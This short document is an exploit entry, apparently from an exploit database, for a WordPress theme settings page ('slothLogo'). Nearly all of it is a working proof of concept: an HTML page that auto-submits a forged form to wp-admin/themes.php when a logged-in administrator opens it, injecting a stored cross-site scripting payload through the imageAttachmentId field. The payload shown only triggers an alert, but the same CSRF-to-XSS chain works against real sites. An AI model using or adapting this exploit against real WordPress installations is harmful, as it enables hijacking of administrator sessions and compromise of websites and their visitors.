## https://sploitus.com/exploit?id=WPEX-ID:1C93EA8F-4E68-4DA1-994E-35A5873278BA
Make a logged in Admin open a page containing the HTML code below
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/themes.php?page=slothLogo" method="POST">
<input type="text" name="imageAttachmentId" value='1"><img src onerror=alert(/XSS/)>'>
<input type="submit" value="submit">
</form>
</body>